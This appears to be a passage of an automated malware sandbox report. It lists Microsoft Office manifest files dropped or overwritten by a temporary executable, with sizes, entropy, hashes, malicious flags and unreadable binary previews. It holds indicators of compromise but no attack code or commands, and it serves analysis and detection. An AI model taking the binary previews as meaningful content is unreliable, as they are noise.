                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:6S)..`...94.j@>e...\..A..}t.Q;..zgp....`...{.~`4..H....i.Vd...V:t..>#$j.Xc.o....!.0."...g-....w...2..Y...0.....e.u...dC..R..n.0.A.Vd."5.).7*..A,(......d.... V....n.T?..e.-..|<.&|.O<...u)...2...N). .*'(....g...h..E1.4K..v.....X....`OY~..7.Y.......g.#........<Xjj.H.v.1.$.=.....i...@.YX....0......H.Mda..{Rb....-....:-.-.............@v.!......K .a.l.%$>..m.G..........BE@A..XfU..l'.4.V.|...Tx..S....LD...)..<.......C.b.[(i..}@"....nG.n..WxL..`@.f.4.ai.r.kG}...a.,..x..GR..../......P.rui..3.....+..2...Wf.r...0.V}. .R;EZ..A......(4,.."."..Oy,...j.o......U.Q.35R.5..t!.plTH<;...'c.6...<...7~.=.o.)...,......R..m+...v.rA...sY...y..8Fb.R..f.p_..z...L..(0g..Y.d.b>w....R..2..m..1.R.^...lXh.N./......Hl.u.Ml0..x.#.X$...M...6h..-"...1..$s.>.....-....Cz..3...#~.....b{...{....j..#c..Y.\J.C.'.........B0[.'.3.".,n.Y...|(....z...i.(.+...>.f5c%4."S..O.$h.$.......!4.......R.J,..l..\....+.....xR.4.y.7..|..l..t..0.OwV.c.2...W.!..r>..{.{.....uA.c......_.sp<..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):802643
                                                                                                                                                                                                                                                Entropy (8bit):6.379234876290679
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:XfUlahP4qAhQhespK0vFM0d5MxuOtRw7q29GpNe+l4VXpcMjbes:8CgFMJAuOrw7wQL5Lj3
                                                                                                                                                                                                                                                MD5:B5605F577E08A6D2C8AEF481284BDC97
                                                                                                                                                                                                                                                SHA1:6EF822F7BE94EC327B35EEDEFE4D67A2429BE521
                                                                                                                                                                                                                                                SHA-256:57F31404C6EABE94950734325445823271463385720E863F0C9083AD9F0524BF
                                                                                                                                                                                                                                                SHA-512:16607004C8359F6FC71CE023BC18A50E87B31CD863564EAF77F7AFF0D7B6B000CCAD131455CCB45403A39AB441F4E0462537EADEE146A00818430B6E489AB7A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*[.sQ-Q:...4p!.W6:....J.A.+^e.]H....O..F...)...mI.`.....A.Xq............l._X8).7.".fC.8.D..[..Q..De.$...>.....$e.../.1@.B..u.....^+..j.i.......E..........G.3f..l.(....T..2K....Sm..BG..F.......{[....*....6../".Q._...R....a..$F)...V....mLD...m.....0.u...vw......vj..C.....j...x.y%..).6..z..2:o.U........AT..g.....,M..#..w...I8".X...*.9...#.y4.........~q.g._,j..@%..n.M~.1T..u&....U....pD..%/....p.m...G.M...N......-.X .....Z...D...|...3....o....^d.v..nr.emj..3....0..:3...7sMK.-v.{...ly......&.Tb.a>..`..1{v(..7._. ......86+q.`^.~..0d...]..-.1~.x......3o.k.....Qq..qe~.C.U....|...lE..nd*...9.}..]..c.dj.=[.kL..P3....N..$.j..t...^.o.>B#m..G/l%.$....+5.1R..E....$.{..+.. .~..w..?.......k......N%:...;.WH.9....,....$......X.Y;...!.......[N-.-......p.9QW..q..t............zm./D...\=L...\G\<6..5Qj .....I..#.L.N.....,...: ...%+.y;...}?..@.hg.O...|&../.....Jb....V..W.%k0W.q..q.q..})\..iW.e0.c....$H....H...N-..EjK..[...Z2.....@!.X..Gr.6.f.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2136
                                                                                                                                                                                                                                                Entropy (8bit):7.891878257942176
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:L4qPMuFqRbzdUWS8RXZ/kxWF1tcQP4o0jZtw4y:UqPMu8RLSYZskPcle4y
                                                                                                                                                                                                                                                MD5:A4894E15DB49BCFD329AE6B6E25C8819
                                                                                                                                                                                                                                                SHA1:2F2AFE8E86E9C95A9D7AE4DB4A9E90605D85F568
                                                                                                                                                                                                                                                SHA-256:96329C44CC8CE6A223B0173DCEA9AFAE2BDFB39977C62FF70FA6DE0F70E0E2B7
                                                                                                                                                                                                                                                SHA-512:A9D968BF69430BE48BAED2F08F0A56C1F1AF870ADBD2AF382B85D01BDDA09B8111DF1355A7F59A7F10C95CD707063C4B37CBFAE99CD08864571CBC142A2451EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:,.<.....|..C~.Fc.2d.uU..-.......'..2...0.~.h....C..C.d&.....Eo...y.. ...<p.3O....nb.....]..p\.P.X..qd.......#..87.Vc....7.R..v^.\.a/.[.n...rP..q..2...._M!....X...LR2.-&........qLR.p(.#3I.[... F?.G1J...a+..H..h$..J..]f....XG...k.e.kD.)....W....v....a..:.|.Z%.."..2.C...M~Z.[...4.......(@ ....|4......\j....%,.YE....%Z..RJ.|.I(S...DcFh..d..,.+..z....C..,..|.|i...t]...LL.......L.KS.6.R19..r&.6..xy....e.S[.@.l..>.....8.6`..:......../_C..I...D..bS.C.2..wn...Jr......6'...*E.*..+..y..c6.......N_.Z.b..4Y4...a[.......q..Q:...Q...I.5...P.).G4...L8..b.m..,......q.....o;#..=.........p'..7D&(.6`V!.C..?v.........c....Y...0.I.p{... .R.&E......h.....y.r....=0.8..U[3..uT.\.E...N3..../.K.....g........!..AH.wG...1..Xop293e..F.`.Nr.w.7....J.u...*...H]*....Ux....u.S..'3G.? ..Sl.z.B..Ue...|.2...g.)..Z.'.h...@(..w{.....(.....f.U9..;b.O..Gc.....h.c2.K..g......'...f..%.L..*.....v. %U3.+........fT?..g.....I...W.........kV.......p.D.g...%o.7..M..Eo{{...:.4.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):496765
                                                                                                                                                                                                                                                Entropy (8bit):7.623344101533141
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:d9adplPJARkwPXDCc2708/uV0NXIiZGkysi1HGshwklWaozabOGy:udzSiMZEH/OwQ0aiGy
                                                                                                                                                                                                                                                MD5:80B27D26FEF5007BCAC0D40C214B2068
                                                                                                                                                                                                                                                SHA1:5FB3EDFB5FF8021FB9CE37B4382F5819243F9B60
                                                                                                                                                                                                                                                SHA-256:685A0DD5712E280E6EB6ABB93318CC22B1E2EB352ECEDA9692077BE6AE3642BD
                                                                                                                                                                                                                                                SHA-512:B4C0753D8BF81093396CA0BC4D9E508E97E0DF78102FBCC0B766285137CEE26EBA3CA77122C56BBA4AC2F3EA157D5F085ED280D8DA7642D35B7E81E9D0DA8D0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1..[+....W..I..~k.>...%.>.8..q.D..A?...q....g`...\...A..is*!eD..)...6%....S.....<...IbS.."..G&...0nw.thS...}iu.n.!p3J....w.S....l..7.........4.!......) ......}..m.2....E,T.P.....x.6.c..x.'...N.a.<...YI...{..F...BW......F].D.5.....E..K^uy(vD.GA.../.........?.......X.K......0..1.....D..<..b...'...>ChsaD.u.....n.;.....%-s.?.z...g......8m5...r#.8f.Ni<.. z^G.e..Y.q.^.&..$"...&.%..>...2.r@.]&..(.\l......I.._.S...y`s.O.aN..p...~w.=.Y>u./.H=P.fG.....4.>....ti.T|.;...=.......x...{. o..D..:...8B.............UQ.+.v..U..p.5sa..^.=.!.....M-{.\..@.'r......@.=......$.U.4........#.4.k9........wi...m%f......0].......K..|x..K<he.AM.J0...A.zQ<....k.....@`#.;.4..A...C..bf.R......J._A.;..~z....P...i...(.B\...m...'N...O$....U,1>3.I.h...(...5..f*<...}..\ZK...J....g..i.>8...<o..k.;.b.2......h;...G.j..........W..F4LQ......o(.?...Q.z.>.......1.D..!-`0.v...Y..,..[..dJC...j..Y......4.L...Ym...9%.c..........h......d./m.C.Wm..@.=...B..`.S.{.......`..x...{.R..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.895017058695003
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:CcJwNDTQkxkd1iWBxzZlyTlUgL0RT/BiI04o0jZtwm:CcJwtzWd9zZQTlUJT/p9lem
                                                                                                                                                                                                                                                MD5:9BBBE7F4D3CA121C3FE0B2E4FC4581ED
                                                                                                                                                                                                                                                SHA1:12FE2C1CD445941FC45B89403876753D6523AC47
                                                                                                                                                                                                                                                SHA-256:0D2D660D9C0732EEBE0C3DEE5EA91812BB800ACC902BF074B1E2EC6B085340D5
                                                                                                                                                                                                                                                SHA-512:DA30E7A6F269EC632A9A4784A0754FB72205CC3FF436030BA9D966B194B5E48E9890E0DC2E78CED08B412F6474ECE9EE0BB0521792AC4C1DCB5CE46EA3DF46C3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:L.T....9....#...5.x6..&.F.a.....y..|'...S.R.... ...(U.|...v.vD.\C@o.$.f.._p...M.rm.@..N. 1.}.\....Hs;.w..0...W.e>..M.!..=N..&?....SX.....R8...Xu..<...5..3.....3gg2..NO....r[H...a.3..`O..]j:Q.=.Z+C'.Z<).E.>5....Q......|..)y..0......]dz...~I.n\.6<.)..e7.0.t.Pe...y.......1.&X"....sa.........L...P7.t~..Q|bf!....f..L..X.{9...l.|:.y.+[.BMW.........l;.o.q.G.~......r.<o.........J'..!=^.......?..,:...<._:.If..r)...8.[m....<\ R1.s....J....7.;>B.....;....?.3?.e.gv..}..........~.g?.s4,.......6>1..?..@.;1..v.H..7.'.Hz. V....1...b....|..x5..@'.N/..}jn.k.....o.z.....R..{kc.Y.........T...PE.ev..?/...4M.;.Q[.<.....8a..I:=..p.....7...ta.}2.w..}.."'.(.k.gXu`....c!.... V....j.=..&...;?`.D{.....n...}... !3NF...!4..?fr!...g./q...*Q..fh..A....../.L2..-.r.L...)...9{.cF.,F.S..].$). O..7D._.j..=HV.2./@.R.%5....l.06o.s<[..2"(......h..r.E.."F0c....mL3..Z..Hh..Q>.!.......J.L'.BtQ.}....V0.&.x..R..5...s.}7tc..ZK....r..]h.f...8..O...R...:..+....<./..Y.PW..V.k.2.!...l...

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0019-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):255220
                                                                                                                                                                                                                                                Entropy (8bit):7.999375167830561
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:762xy69xnvoDLPClk/1EALkGMyurwMfvIi8Rqclnmk1ub:7q69x6PCUIGMvrwMfAiZpiy
                                                                                                                                                                                                                                                MD5:A86C6599E2A2BCCD39B63CD9C8DBC140
                                                                                                                                                                                                                                                SHA1:5380F7C8EA58EA855672F50DD3FBE894F99CD3D4
                                                                                                                                                                                                                                                SHA-256:3A2F51C3B47C5FB8F72FDA117341A56BCD29964EFB51A97E500613F07DC9D6C1
                                                                                                                                                                                                                                                SHA-512:52732CB0634AA357DDA800265056FEF6771C1605174F4B3FEABD6C626A60BE768712A04D03F95E52778DAF25F845DC7D95743D4171717CC78B41DBC6CA7A28D8
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..io..."..)..*m[.y...d...E.Xl...%%...7i6#............Nm:........5J.....C..I_.X.V......\....b9.a.#.&..Wtt..N...I..K....".D}....r..#....kF0.X.8nK..O.un.CK..*`...2..T.^....x.8.j.E7....aA1..U.....}IF..c..Ic...Z.....E...6,..K.q..?.....Z..l..@QXV.2...6&b.C?Z..Y..T....[n...-.$S........'&..dp 1.8|...=8..7.^b...`.A.+.Z._..)D.L..4..E..tR....,'...8...s.S..`...,..#..........H...3R$=.~a.......8.v..O^.k....h;...8.|..s|X.R.~..:w........A"....@....& ...`84.^.....ELuR.P..(.J...o..9r!s...y.Z.6...&w.~.h-&..:.4M.....F.,........=s.@L8..%>.dm.........uF1.......9.fNZ.1f.r.:U..QHl....*.2V7dBV...,..}..]."t....6w./..........}3b.@6...V.+h."8..'X...M..o..q.7..2../..8H..Z.W.>....U7.6Oe.Mb....g.wL..6.s....r..4yM...6.D....P.1BN..}t.u&>^Q..Iz..B.R........TkZ..f....&Z...A[.._e....WM.].k.N.X|.+..V..b.h3..z8).].%..].i..9..?..x.^.d..7..L]L..fiim>.i3N..|.`.'.V.\.7f..S.{.m.2g.o.J.x..m..Wn#E....(.e....Kf...E...F~.@.g.Zhzl.t...a7.Zhe..hmL%..*sM&..Kb..&f1.1..ymS.$#..a.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0019-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.915289034964182
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:n5DzVWnH1F5MCVuOnEYCSTHCTogFvomaTcjrgmqcN276R7kJeiVjmJrc0YXUZtwp:n5yFuiPEgizFvor3fcw76gr4o0jZtwp
                                                                                                                                                                                                                                                MD5:8AF28AB84D9627B0F5E135A18875E8DE
                                                                                                                                                                                                                                                SHA1:BA4B181CE274628C720FC4A2FD4292DAA4721DCE
                                                                                                                                                                                                                                                SHA-256:9AEFD0552EC86E8B8DAF0689FCF471C48564AB09655DEF6EDB6CCF92CF45EB8E
                                                                                                                                                                                                                                                SHA-512:AF72B2E7F628CEC84923C88F942E8754CF1DF8FD141BC409473F5D6E80BD6F8B97C88FF0EBF13CF86C7A19DC81E8F043BC41904EE2B85C8975174910BC2241A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....Q7b!K..Z.i...?v......q.y~".9.{.paM/..|%.|...d..$~.~.S.w.....U,s..(.G..zU...E...q....q1....$]].v%.gs...g.1.6.e7d..x...yS|>.s.Z8T[AO....6.6......BC.d.....M._J...1.. ....w.7.......n......]Q.*.s...U...<..4...)..U.....;Rz^.5.n.08.<.h.[.F...HY..".U..K2.@..Y.hA.j..4..".u.....Q.i.u..}..{..A.aD.I.f.B....%...P..)..}.I.,\.x.(}...(.u..:...we..(. ..;.3..{K...8v..-.X/+@..JoU.:-:b.=...|..T..a..ys.X......*.3.$@....[.z...zP.......ck..?..?a....s\dzYW....g...3..{_..n......E'..Y....b2...$.$..N..*...n..n..F....z.Y...=...z..C.F..W....~Y..m.R.~[TA.p..I$$..F........(..G;....i.k1...g...8"p....S\.s.....c(Oq.....C.>....t.3.~a.Y..e..&.>.. ..03m.^`.1..M..j"....r3#.w..b:~..j.L..L...n$.l........Vp.0.W...JL.....7-Z..<....sxCq].....j..Fis\md..9u}.x'....!_.b..<.e.I.E|I+....S.X6.....$^.../@x.....O.....6P#F.?B.....Vv.....<..4.......*r.9.pw...............u.(..P.L.;F.j....r..~EU..MZ......S.@..........?.Up..,,....@.#.K....k.4o.\.0"......~.Zh..j..7....>RnL....[.C..}

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001A-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1135990
                                                                                                                                                                                                                                                Entropy (8bit):6.228890677559846
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:2nXlyaKtqoA0mEcgQIknf4hTyoeLS1OXv5:2VZ2qv0n6fgtyoeWQh
                                                                                                                                                                                                                                                MD5:76D5F34BC2F8B3456BFAB59BF7396409
                                                                                                                                                                                                                                                SHA1:61BC50C1014234A01BA83E145B0ECBE01CE87F34
                                                                                                                                                                                                                                                SHA-256:8DF2A9F1A6BD3EAAB6A055B06222037A711B3ABFF56279EA292B5CE0B02B8297
                                                                                                                                                                                                                                                SHA-512:4C21B53E7CEBD79D657E2B37974530FDEF181B9FCADFAFD2CEDA60B94710EB56D2487454D1D3FB891BEA6B6AB86030691E6A19ACC4C066B6ED044C60F0ED9D28
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......3lNt.;.:..LX.}.2E.p.l..".....5..7%V..C."n.D.|.,.k.b%.[h.yU... ..b..O.c>..\.."......q;.y3..'0..c}..^.L."......tc.)c...?.#$;.>.L......j.d.....P.x.%4\F.~7.......N\......s.N...,...T.{ ........i!..p*$.F...+.L.$..2...G...9...{...[.4..R{F.%.\r.d...D.D`.2.l..P&...\HOr......W1f...... M]....(.........:[....j.$/..\e.qC;!M......t..K.......A.'.mjJ&..Kl.TW|M\.."G..:..1F.=9.@lI.......m(..q....p..*,...f....K.t.cK...T..hx8..I.E.]e.....1..U..R..5{u....... w.f.de&.#i.9.P.0a..H.<.f.>...d.p..=....&.sq.W..Y+NyL.):_o..;#[A...m....4......O.ezc.F.o/.Bo.Edt...#.EA.M...G........s..<k9.@:].c..y.Q..u.........V..;z5..P.%...x....2.jFg......Sg..k...........\...,...f.~gI.Vl...A\.R.&.r.C.gn._>.....PPZ8...uh...q..KO.\c 3Cc.iU.}...Y-.....::.n..%.6....K#nl;Uc D...2..nE.[.`...&e..=.)%.....%-.Bj...e.....yB...+<.U..<.s.6...g./....mGd.....R.....tzYi..G..U.k)..T._..w.L.O.t.l1.[L..l.mk.v.{])<....S.....@p.&......vF..&a......w.hkh...b.~g. .....p-8..O6...(=;.>...0..I..b.....B.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001A-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20186
                                                                                                                                                                                                                                                Entropy (8bit):7.989348069113853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:8js4GNz/9ABvzpbauvpGF0id/M4a/4v599rsqawLs+f6inF:0XY/9kvzRauAK4v59CqaR2F
                                                                                                                                                                                                                                                MD5:FF4B2B70CC84B013FE9C11D6EE1B196B
                                                                                                                                                                                                                                                SHA1:F37C3EEFA9D500BBDA10F24A6A16AE61CC8F4C8E
                                                                                                                                                                                                                                                SHA-256:D048C31EDB19B921F9ABA399EAF24B6AA65E79E75007701124D150793DC96B1A
                                                                                                                                                                                                                                                SHA-512:04CC2F38FABFC7CE028F9E91771C0F5DE49403E47D40CDA981CB208CEC287AA3C6A1E096E33D19E4B1C410770B38AA36843474DE494E603ECDDB63B9146E20FE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...2Hy(~]a.e.....u5.X|AM._.1..^R.{Z.4]P~../.D.4e..g.QoR)S...I..OT<n.Z.c..%.....B..-. ...C..0@$F....{p..-I..4..qT..N..S...}...y............o......%..v.i.D.9.....k.;j\.[."..%g........<C6.w...N.M..#H..Y~f{........VC.j...m.x...2.e...J.n...q!.4..A...y}`.s(.c.[R..O...5-......q........<......?....=..w.D..0...%..<.....\A.....J;ID../W..]8.T..5.......F......._.^u..}.&[.9.....42.."...|..?.sP.}.D.!7..w..d......W2.Q._'.=....k.B....p..3.dN....x..?.S.T......FK..../Zc.._.`..<;..{.u.b.s.|.\j..Z|...2.....e../...Ud..a..b..K.B......jz.C.qB.I.@. yF.1...Kj......N.':A.F.......edv'+.b.......)Y....:..X..\...b9#AF.KPyP.9|t.0..w...4.-.....Q....Z...T,@..(..._.Z....:...}(...N........._(....S .+.9.R.\._#.Vd.......X.8...................aon...D....J:....89...g..\A.hO.oE..a..I[.v.%Mx..-..c..&.....V...X..2H.s.d..7g....bB..X..G...$.S4.'.}...p.._.,J....N%....QC.........F8W...Ze.......<:1......P.......+.). r_Ih.v..q.T..F.t!.;n.$..ugE.`..;,...J...........g..L.an..b.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):769438
                                                                                                                                                                                                                                                Entropy (8bit):6.898357454309555
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:wV54AVRk720KquvbqWqHQs6RPlqTvCsNOIx:qdVa63quvbcwsqtqrCBIx
                                                                                                                                                                                                                                                MD5:64D2A95A481465D1ADDE72B2EB77827E
                                                                                                                                                                                                                                                SHA1:DC04D4496F64FFF21EC9424F11EEA48B169756AF
                                                                                                                                                                                                                                                SHA-256:C9067F79C30558A2C5C695F4EE1738061B407743E4DA17B8EBF39967F295FF0F
                                                                                                                                                                                                                                                SHA-512:5613CAE90B8578E911BE9607A69652C0B719A1D24F078925FC782CDBA2A5F63D8665A85D6ADCA69777A0CBBA0287B62E52E8049D11A8E4FA65309FC24EE43A89
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.;\....qQ..B..SA|3.[..E<..&o...$B.\.R>=..d......WE#o.~J....6*.0 WU..^...V..x5..j..q...h.}..@....0$...h...e...3.......v...N....V89.>M.....g....j..{Z2..`2...*0....._.uQS....!%.h....m.....A..G..F3...-"..ziD....&pa`..L.O...j.z.I...*..E.M.....d..Y.Kf$!..&.*...]...A..c.o..!..sP...p4.U.....b..g.)......qbAj..(G\....j.>....B.E0..+..41....w..s...46.?"9W......L\.Y......j.Qle.........xh.B9b.r...C.m:.ne.['..b.z.p..B.J;l..w.i....W.<M..M..a..R.y*.....l.).a....g.....}{..J,...mw...%.o..e.t..?.1...\]^.`p....6....O..n@.=b...........XU...\.OS..}...}d.c...f...9"...|.tClc.B...\.O...ph..\7"b.$C..S*.l+...Le<....b.V..:.|..T...T....\U#.J....j..CN.U....i.`.q5.|.Cq.n../..Olm:...0.j......[...N..r..........+......r'...:8~b0......(.F.A..FD.V#...kI.....<.0..?:v.d$.I.L...._f..a..E^.9........w......_...{....lbe...m8.SfF..&.V.....].#...Q...'`...j1.$..q....:ci...+..f.M/.n.0.....g..'.L.....7...;=...Pk.X..{p.n....0l.N.I..X..i~...1..l>..2..9xX.V.6.Tg..)..;..<.<$....@..1...y...

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.906710787248565
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:x++v5RSRtCZy1vt5LOnOpfHOQzQreTDp20YI4o0jZtwUxc:x+GROtCI1l5YOgNreh2BZleUxc
                                                                                                                                                                                                                                                MD5:8D8A0D24D1A5F19B2E041D66464910B2
                                                                                                                                                                                                                                                SHA1:0EB4437F5308C2242628F7CBAAD3DA5B7530BFF7
                                                                                                                                                                                                                                                SHA-256:7F5193C13A8BA6AAB748B33F9565359B98D2E717E1189757578B4FB95FCD1841
                                                                                                                                                                                                                                                SHA-512:ABE35A63509E5D9B0FAD4D6F755F51F2D6D287473AD3C2B3D08ED5BEC07219BABDC76B84465E17B74258B56B754E16DFCFD78C0B3B95B29700976D8513348B0D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:K3........I2..]....;.^W|`.............G+.......v....PY(|S).'..@...~%/.....'.......rD1X...Rx.TD.}|...Fc.Q.Z..."..(....S'"..0"*.88.f....?.3.... ..8.B..-J.....H...`m.T...J.^......N..-.P.xm.T...5..O..[A..^{5.r...f@{../..A......\......5$.&*.w....l..8).*h..D$.xm..c......l...........O....0..n-K./,.W.0.o.*9..}x..5za.)e.O0...B[;Z..f.Q...K.G.I.U..z+.+q..<E..l..y[.\.b....w.z..S.&w6Sw.y?....b>>..-t.......z2T..np..z..S.Y....+).O.-=x.r......Z:...o.yi...WZ6.@...9..Am.EV..Z..!9vt.0m..i4.k..W8.(...|A##/4@.p..!e.n.8 ......H.M.1Z:..~.Ed...R..k.....5..UH.c....o....jf......Gc...,..Z..D%...?4H...U.........`.K...-7..B...g.P..."..(./c..v...}.Z.A.m.....Y... j....|i=.B..3l.m..{0.3.3a-..nK..lT/...lJ[&............u....67.t(.p...E..c.3.#cJ.8.oG..W...."TM....^!_..\.)C..T....{+.!...)w....4Q,...x]...0.sA.$#.Jow.yGEW.N.r.....I&....0_R../...(H_....-.../.-Pg..A{.8P1.../..N<."..Gc.2...).]...W.3%..R..l...-...L..0.VpN.....m.\)To.Q.(..;j--w.....6..us+4r.<|O..p0`..e.....R..'{.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2066
                                                                                                                                                                                                                                                Entropy (8bit):7.895781759871323
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:pTQsqvwwjWNmoKngyiP1KWQgbiZ6D6CbV84o0jZtwfW:tQN3Gc5g/6YlefW
                                                                                                                                                                                                                                                MD5:F6FA7AFA9683F7005CE95371D4D302C2
                                                                                                                                                                                                                                                SHA1:24DB160061BA3EFEBE4B70803548FCB646B276D2
                                                                                                                                                                                                                                                SHA-256:CDBEFCAF00CC6824F900D3921FFFCCB534906EE4BCF61F19E3EB001DEF48156E
                                                                                                                                                                                                                                                SHA-512:809AA5F9DD64F06C0F358767415DE140DE1C378395B0A022F294272BDAD51CC4723723D7C40F8D93F205EDD18429C37DEB44679EE7FFA57F16324799D2875FC5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
